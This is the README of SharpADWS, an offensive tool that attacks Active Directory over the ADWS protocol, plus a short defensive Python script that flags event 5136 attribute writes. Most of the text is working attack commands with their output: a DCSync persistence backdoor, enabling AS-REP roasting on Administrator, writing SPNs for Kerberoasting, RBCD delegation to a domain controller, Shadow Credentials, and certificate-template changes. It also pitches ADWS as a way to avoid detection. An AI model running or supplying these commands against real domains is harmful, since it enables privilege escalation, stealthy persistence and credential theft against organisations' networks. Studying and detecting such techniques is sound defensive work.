Project Introduction
SharpADWS is an Active Directory reconnaissance and exploitation tool built for Red Teams. It collects and modifies Active Directory data over the Active Directory Web Services (ADWS) protocol.
Normally, Active Directory is enumerated or manipulated over the LDAP protocol. SharpADWS can extract or modify Active Directory data without communicating directly with the LDAP server. Under ADWS, LDAP queries are wrapped in a series of SOAP messages and sent to the ADWS server over a NET TCP Binding encrypted channel. The ADWS server then unpacks the LDAP queries locally and forwards them to the LDAP server running on the same domain controller.
Advantages
One of the main benefits of using ADWS for LDAP post-exploitation is that it is relatively little known; because the LDAP traffic is never sent over the network, it is not easily detected by common monitoring tools. ADWS runs as a service entirely separate from LDAP, is available on TCP port 9389, and uses the SOAP protocol as its interface.
While researching ADWS, we noticed that, because it is a SOAP web service, the actual LDAP queries are executed locally on the domain controller. This has a number of interesting side effects that turn out to be advantageous. For example, when analysing LDAP queries on a domain controller, you may notice that the logs show the queries originating from 127.0.0.1, and in many cases they will be overlooked.
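Because the LDAP traffic never crosses the network, detection shifts to the domain controller's own object-change auditing. As an added example that is not part of SharpADWS, the Python below triages constructed Windows Security event 5136 (Directory Service Changes) records for the attribute writes that the write actions documented below perform; the simplified dict layout and all sample values are assumptions built for this example, and 5136 only fires where Directory Service Changes auditing and object SACLs are configured.

```python
# Added example, not part of SharpADWS: triage Windows Security event 5136 records
# for the attribute writes the README's "write" actions perform (constructed data).
SENSITIVE_ATTRS = {
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "RBCD delegation written",
    "msDS-KeyCredentialLink": "Shadow Credentials key added",
    "servicePrincipalName": "SPN written (account becomes Kerberoastable)",
    "nTSecurityDescriptor": "DACL changed (check for DS-Replication-Get-Changes*)",
    "userAccountControl": None,             # decided by flag bits below
    "msPKI-Certificate-Name-Flag": None,
}
DONT_REQ_PREAUTH = 0x400000                 # userAccountControl bit
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1     # msPKI-Certificate-Name-Flag bit
VALUE_ADDED = "%%14674"                     # 5136 OperationType "Value Added"

def triage_5136(events):
    findings = []                           # (actor, objectDN, attribute, reason)
    for ev in events:
        attr = ev["AttributeLDAPDisplayName"]
        if attr not in SENSITIVE_ATTRS or ev["OperationType"] != VALUE_ADDED:
            continue
        reason = SENSITIVE_ATTRS[attr]
        if attr == "userAccountControl":
            if not int(ev["AttributeValue"]) & DONT_REQ_PREAUTH:
                continue
            reason = "DONT_REQ_PREAUTH set (AS-REP roastable)"
        elif attr == "msPKI-Certificate-Name-Flag":
            if not int(ev["AttributeValue"]) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
                continue
            reason = "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT enabled on template"
        findings.append((ev["SubjectUserName"], ev["ObjectDN"], attr, reason))
    return findings

def _ev(actor, dn, attr, value, op=VALUE_ADDED):  # build one 5136-like record
    return {"SubjectUserName": actor, "ObjectDN": dn, "OperationType": op,
            "AttributeLDAPDisplayName": attr, "AttributeValue": value}

SAMPLE_EVENTS = [  # constructed sample records, not from a real domain
    _ev("Marcus", "CN=DC01,OU=Domain Controllers,DC=corp,DC=local",
        "msDS-AllowedToActOnBehalfOfOtherIdentity", "<binary security descriptor>"),
    _ev("Marcus", "CN=Administrator,CN=Users,DC=corp,DC=local",
        "userAccountControl", str(0x200 | DONT_REQ_PREAUTH)),  # NORMAL_ACCOUNT + flag
    _ev("helpdesk", "CN=Bob,CN=Users,DC=corp,DC=local", "description", "Sales"),  # benign
    _ev("Marcus", "CN=User,CN=Certificate Templates,CN=Public Key Services,"
        "CN=Services,CN=Configuration,DC=corp,DC=local",
        "msPKI-Certificate-Name-Flag", str(0x1 | 0x2000000)),  # + SUBJECT_ALT_REQUIRE_UPN
]

if __name__ == "__main__":
    for actor, dn, attr, reason in triage_5136(SAMPLE_EVENTS):
        print("[!] %s wrote %s on %s: %s" % (actor, attr, dn, reason))
```

A paired "Value Deleted" (%%14675) record carrying the old userAccountControl value is ignored on purpose, so each flag change is reported once.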
Protocol Implementation
SharpADWS implements the relevant details of the MS-ADDM, MS-WSTIM and MS-WSDS protocols; with this project's source code you can easily perform the Active Directory Web Services operations described in the following sections.
Usage
The -h command-line argument displays the following usage information:
C:\Users\Marcus>SharpADWS.exe -h
SharpADWS 1.0.0-beta - Copyright (c) 2024 WHOAMI (whoamianony.top)
-h Display this help screen
Connection options:
-d Specify domain for enumeration
-u Username to use for ADWS Connection
-p Password to use for ADWS Connection
Supported methods:
Cache Dump all objectSids to cache file for Acl methods
Acl Enumerate and analyze DACLs for specified objects, specifically Users, Computers, Groups, Domains, DomainControllers and GPOs
DCSync Enumerate all DCSync-capable accounts and can set DCSync backdoors
DontReqPreAuth Enumerates all accounts that do not require kerberos preauthentication, and can enable this option for accounts
Kerberoastable Enumerates all Kerberoastable accounts, and can write SPNs for accounts
AddComputer Add a machine account within the scope of ms-DS-MachineAccountQuota for RBCD attack
RBCD Read, write and remove msDS-AllowedToActOnBehalfOfOtherIdentity attributes for Resource-Based Constrained Delegation attack
Certify Enumerate all ADCS data like Certify.exe, and can write template attributes
Whisker List, add and remove msDS-KeyCredentialLink attribute like Whisker.exe for ShadowCredentials attack
FindDelegation Enumerate all delegation relationships for the target domain
Acl options:
-dn RFC 2253 DN to base search from
-scope Set your Scope, support Base (Default), Onelevel, Subtree
-trustee The sAMAccountName of a security principal to check for its effective permissions
-right Filter DACL for a specific AD rights
-rid Specify a rid value and filter out DACL that security principal's rid is greater than it
-user Enumerate DACL for all user objects
-computer Enumerate DACL for all computer objects
-group Enumerate DACL for all group objects
-domain Enumerate DACL for all domain objects
-domaincontroller Enumerate DACL for all domain controller objects
-gpo Enumerate DACL for all gpo objects
DCSync options:
-action [{list, write}] Action to operate on DCSync method
list List all accounts with DCSync permissions
write Escalate accounts with DCSync permissions
-target Specify the sAMAccountName of the account
DontReqPreAuth options:
-action [{list, write}] Action to operate on DontReqPreAuth method
list List all accounts that do not require kerberos preauthentication
write Enable do not require kerberos preauthentication for an account
-target Specify the sAMAccountName of the account
Kerberoastable options:
-action [{list, write}] Action to operate on Kerberoastable method
list List all kerberoastable accounts
write Write SPNs for an account to kerberoast
-target Specify the sAMAccountName of the account
AddComputer options:
-computer-name Name of computer to add, without '$' suffix
-computer-pass Password to set for the computer
RBCD options:
-action [{read,write,remove}]
Action to operate on RBCD method
read Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the account
write Write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the account
remove Remove the msDS-AllowedToActOnBehalfOfOtherIdentity attribute value of the account added by the write action
Certify options:
-action [{find, modify}]
Action to operate on Certify method
find Find all CA and certificate templates
modify Modify certificate templates
-enrolleeSuppliesSubject
Enumerate certificate templates with CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag for find action,
and can enable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag for modify action
-clientAuth Enumerate certificate templates with client authentication pKIExtendedKeyUsage for find action,
and can enable Client Authentication for modify action
Whisker options:
-action [{list, add, remove}]
Action to operate on ShadowCredentials method
list List all the values of the msDS-KeyCredentialLink attribute for an account
add Add a new value to the msDS-KeyCredentialLink attribute for an account
remove Remove a value from the msDS-KeyCredentialLink attribute for an account
-device-id Specify the DeviceID to remove
-target Specify the sAMAccountName of the account
FindDelegation options:
No options, just run!
Cache
When enumerating ACLs, SharpADWS avoids issuing an extra ADWS request for every unknown trustee object: the Cache method must first build a complete cache of all account objects and save it to a file, which prevents generating a large amount of (unnecessary) traffic. The cache maps the name of every account object in the current domain to its objectSid.
C:\Users\Marcus>SharpADWS.exe Cache
[*] Cache file has been generated: object.cache
ACL
The Acl method enumerates the DACL of the object specified by -dn and supports filtering the enumerated DACL with the -trustee, -right and -rid parameters. For example, to enumerate all Domain Controller objects and filter for DACL entries whose trustee is Marcus:
C:\Users\Marcus>SharpADWS.exe acl -dn "OU=Domain Controllers,DC=corp,DC=local" -scope Subtree -trustee Marcus
Severity : Critical
ObjectDN : CN=DC01,OU=Domain Controllers,DC=corp,DC=local
AccessControlType : Allow
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectType : All
Trustee : Marcus
IsInherited : False
Likewise, to enumerate all User objects and filter for DACL entries granting GenericWrite whose trustee has a RID greater than 1000:
C:\Users\Marcus>SharpADWS.exe acl -dn "CN=Users,DC=corp,DC=local" -scope Subtree -right Generic -rid 1000
Severity : Critical
ObjectDN : CN=Bob,CN=Users,DC=corp,DC=local
AccessControlType : Allow
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectType : All
Trustee : Marcus
IsInherited : False
In addition, the Acl method supports enumerating specific object classes:
SharpADWS.exe acl -user # Enumerate DACL for all user objects
SharpADWS.exe acl -computer # Enumerate DACL for all computer objects
SharpADWS.exe acl -group # Enumerate DACL for all group objects
SharpADWS.exe acl -domain # Enumerate DACL for all domain objects
SharpADWS.exe acl -domaincontroller # Enumerate DACL for all domain controller objects
SharpADWS.exe acl -gpo # Enumerate DACL for all gpo objects
Note that the Acl method depends on the mapping cache previously built with the Cache method.
DCSync
The list action of the DCSync method queries all accounts that have been granted the DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and DS-Replication-Get-Changes-In-Filtered-Set rights:
C:\Users\Marcus>SharpADWS.exe DCSync -action list
Severity : Info
ObjectDN : DC=corp,DC=local
AccessControlType : Allow
ActiveDirectoryRights : ExtendedRight
ObjectType : DS-Replication-Get-Changes-All
Trustee : Administrators
IsInherited : False
Severity : Info
ObjectDN : DC=corp,DC=local
AccessControlType : Allow
ActiveDirectoryRights : ExtendedRight
ObjectType : DS-Replication-Get-Changes-All
Trustee : Domain Controllers
IsInherited : False
Severity : Critical
ObjectDN : DC=corp,DC=local
AccessControlType : Allow
ActiveDirectoryRights : ExtendedRight
ObjectType : DS-Replication-Get-Changes-All
Trustee : Alice
IsInherited : False
In addition, with sufficient privileges, the write action grants an account DCSync rights in order to establish a domain persistence backdoor:
C:\Users\Marcus>SharpADWS.exe DCSync -action write -target Marcus
[*] Account Marcus now has DCSync privieges on the domain.
DontReqPreAuth
The list action of the DontReqPreAuth method finds all accounts with the "Do not require Kerberos preauthentication" option set:
C:\Users\Marcus>SharpADWS.exe DontReqPreAuth -action list
[*] Found users that do not require kerberos preauthentication:
[*] CN=Bob,CN=Users,DC=corp,DC=local
[*] CN=Alice,CN=Users,DC=corp,DC=local
[*] CN=John,CN=Users,DC=corp,DC=local
In addition, you can abuse WriteProperty rights over the target account's userAccountControl attribute and use the write action to enable the "Do not require Kerberos preauthentication" option on that account in order to perform an AS-REP Roasting attack:
C:\Users\Marcus>SharpADWS.exe DontReqPreAuth -action write -target Administrator
[*] Set DontReqPreAuth for user Administrator successfully!
Kerberoastable
The list action of the Kerberoastable method finds all accounts that have an SPN set:
C:\Users\Marcus>SharpADWS.exe Kerberoastable -action list
[*] Found kerberoastable users:
[*] CN=krbtgt,CN=Users,DC=corp,DC=local
[*] kadmin/changepw
[*] CN=Bob,CN=Users,DC=corp,DC=local
[*] WWW/win-iisserver.corp.local/IIS
[*] TERMSERV/win-iisserver.corp.local
[*] CN=John,CN=Users,DC=corp,DC=local
[*] TERMSERV/WIN-SERVER2026
In addition, you can abuse WriteProperty rights over the target account's servicePrincipalName attribute and use the write action to add an SPN to that account (user accounts only) in order to perform a Kerberoasting attack:
C:\Users\Marcus>SharpADWS.exe Kerberoastable -action write -target Administrator
[*] Kerberoast user Administrator successfully!
AddComputer
C:\Users\Marcus>SharpADWS.exe AddComputer -computer-name PENTEST$ -computer-pass Passw0rd
[*] Successfully added machine account PENTEST$ with password Passw0rd.
RBCD
The read action of the RBCD method reads the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the specified account object to check which principals are permitted resource-based delegation to that account:
C:\Users\Marcus>SharpADWS.exe RBCD -action read -delegate-to DC01$
[*] Accounts allowed to act on behalf of other identity:
[*] WIN-IISSERVER$ (S-1-5-21-1315326963-2851134370-1073178800-1106)
[*] WIN-MSSQL$ (S-1-5-21-1315326963-2851134370-1073178800-1103)
[*] WIN-PC8087$ (S-1-5-21-1315326963-2851134370-1073178800-1117)
The write action of the RBCD method writes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the target account object for a Resource-Based Constrained Delegation attack. In the example below, we first create a new machine account PENTEST with the AddComputer method, then run the following command to write the SID of PENTEST into the attribute of DC01:
C:\Users\Marcus>SharpADWS.exe RBCD -action write -delegate-to DC01$ -delegate-from PENTEST$
[*] Delegation rights modified successfully!
[*] PENTEST$ can now impersonate users on DC01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] PENTEST$ (S-1-5-21-1315326963-2851134370-1073178800-1113)
In addition, the remove action deletes the SID added by write from the target object's msDS-AllowedToActOnBehalfOfOtherIdentity attribute:
C:\Users\Marcus>SharpADWS.exe RBCD -action remove -delegate-to DC01$ -delegate-from PENTEST$
[*] Delegation rights modified successfully!
[*] Accounts allowed to act on behalf of other identity has been removed:
[*] PENTEST$ (S-1-5-21-1315326963-2851134370-1073178800-1113)
Certify
The find action of the Certify method enumerates ADCS data like Certify does, including all certification authorities and certificate templates:
C:\Users\Marcus>SharpADWS.exe Certify -action find
[*] Find CA and certificate templates
[*] Using the search base 'CN=Configuration,DC=corp,DC=local'
[*] Listing info about the Enterprise CA 'corp-DC01-CA'
Enterprise CA Name : corp-DC01-CA
DNS Name : DC01.corp.local
FullName : DC01.corp.local\corp-DC01-CA
Certificate Subject : CN=corp-DC01-CA, DC=corp, DC=local
Certificate Serial Number : 2D975C2D49AE4BB7432682E1708C8834
Certificate Validity Start : 2/13/2024 5:55:36 PM
Certificate Validity End : 2/13/2029 6:05:36 PM
CA Permissions :
Enrollment Rights :
: Authenticated Users
Object Control Permissions :
ManageCA :
: Enterprise Admins
: DC01
: Domain Admins
ManageCertificates :
: Enterprise Admins
: DC01
WriteDacl :
: Enterprise Admins
: DC01
: Domain Admins
WriteOwner :
: Enterprise Admins
: DC01
: Domain Admins
WriteProperty :
: Enterprise Admins
: DC01
: Domain Admins
[*] Available Certificates Templates
CA Name : CORP-DC01-CA
Template Name : User
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
pKIExtendedKeyUsage : Encrypting File System Secure Email Client Authentication
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN SUBJECT_ALT_REQUIRE_EMAIL SUBJECT_REQUIRE_EMAIL SUBJECT_REQUIRE_DIRECTORY_PATH
msPkI-Enrollment-Flag : INCLUDE_SYMMETRIC_ALGORITHMS PUBLISH_TO_DS AUTO_ENROLLMENT
msPKI-Private-Key-Flag : EXPORTABLE_KEY
CA Permissions :
Enrollment Rights :
: Domain Admins
: Domain Users
: Enterprise Admins
Object Control Permissions :
WriteDacl :
: Domain Admins
: Enterprise Admins
WriteOwner :
: Domain Admins
: Enterprise Admins
WriteProperty :
: Domain Admins
: Enterprise Admins
: Domain Users
CA Name :
Template Name : UserSignature
Enabled : False
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
pKIExtendedKeyUsage : Secure Email Client Authentication
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN SUBJECT_ALT_REQUIRE_EMAIL SUBJECT_REQUIRE_EMAIL SUBJECT_REQUIRE_DIRECTORY_PATH
msPkI-Enrollment-Flag : AUTO_ENROLLMENT
msPKI-Private-Key-Flag : ATTEST_NONE
CA Permissions :
Enrollment Rights :
: Domain Admins
: Domain Users
: Enterprise Admins
Object Control Permissions :
WriteDacl :
: Domain Admins
: Enterprise Admins
WriteOwner :
: Domain Admins
: Enterprise Admins
WriteProperty :
: Domain Admins
: Enterprise Admins
: Domain Users
# ...
In addition, find supports the -enrolleeSuppliesSubject and -clientAuth options, which filter for certificate templates that have the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag enabled and support Client Authentication:
C:\Users\Marcus>SharpADWS.exe Certify -action find -enrolleeSuppliesSubject -clientAuth
[*] Find CA and certificate templates
[*] Using the search base 'CN=Configuration,DC=corp,DC=local'
[*] Listing info about the Enterprise CA 'corp-DC01-CA'
# ...
[*] Available Certificates Templates
CA Name : CORP-DC01-CA
Template Name : User
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
pKIExtendedKeyUsage : Encrypting File System Secure Email Client Authentication
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT SUBJECT_ALT_REQUIRE_UPN SUBJECT_ALT_REQUIRE_EMAIL SUBJECT_REQUIRE_EMAIL SUBJECT_REQUIRE_DIRECTORY_PATH
msPkI-Enrollment-Flag : INCLUDE_SYMMETRIC_ALGORITHMS PUBLISH_TO_DS AUTO_ENROLLMENT
msPKI-Private-Key-Flag : EXPORTABLE_KEY
CA Permissions :
Enrollment Rights :
: Domain Admins
: Domain Users
: Enterprise Admins
Object Control Permissions :
WriteDacl :
: Domain Admins
: Enterprise Admins
WriteOwner :
: Domain Admins
: Enterprise Admins
WriteProperty :
: Domain Admins
: Enterprise Admins
: Marcus
: Domain Users
# ...
Disclaimer
This tool is intended solely for technical research and formally authorised offensive/defensive engagements. Users must comply with the Cybersecurity Law of the People's Republic of China and must not use it for any illegal activity. If the tool is used for any other purpose, the user bears full legal and joint liability; the author and publisher accept no legal or joint liability.